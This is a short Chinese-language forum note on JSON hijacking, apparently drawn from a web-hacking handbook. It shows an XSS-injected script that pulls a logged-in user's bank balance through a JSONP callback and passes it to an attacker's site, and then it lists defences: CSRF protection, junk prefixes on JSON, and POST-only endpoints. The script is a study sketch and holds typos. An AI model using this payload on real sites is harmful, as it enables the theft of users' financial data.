黑客攻防技术宝典 -
攻:如果网银中的“显示余额”功能是用 Ajax + JSON 做的,就可以按照 XSRF 的方式窃取这个信息.
1.用户登录网银了
2.然后他去一个论坛
3.论坛里有篇文章,其中有人利用XSS漏洞注入了一个脚本
<script>
var script = document.createElement("script");
script.src = "http://.../查看我的余额.json?callback=sendToAttacker";
document.getElelementsByTag("head").appendChild(script);
function sendToAttacker(jsonData){
//jsonData.余额
sendToMySite(jsonData.余额)
}
</script>
4.用户查看这篇文章,中标
============================================================
防:
1.能防RF,就能防JSON挟持
2.故意在JSON数据前面弄点乱七八糟的东西,这样就导致 script.scr=查看.json 出错,但浏览器拿到JSON时却不会出错
3.使“查看余额.json”只支持POST
页:
[1]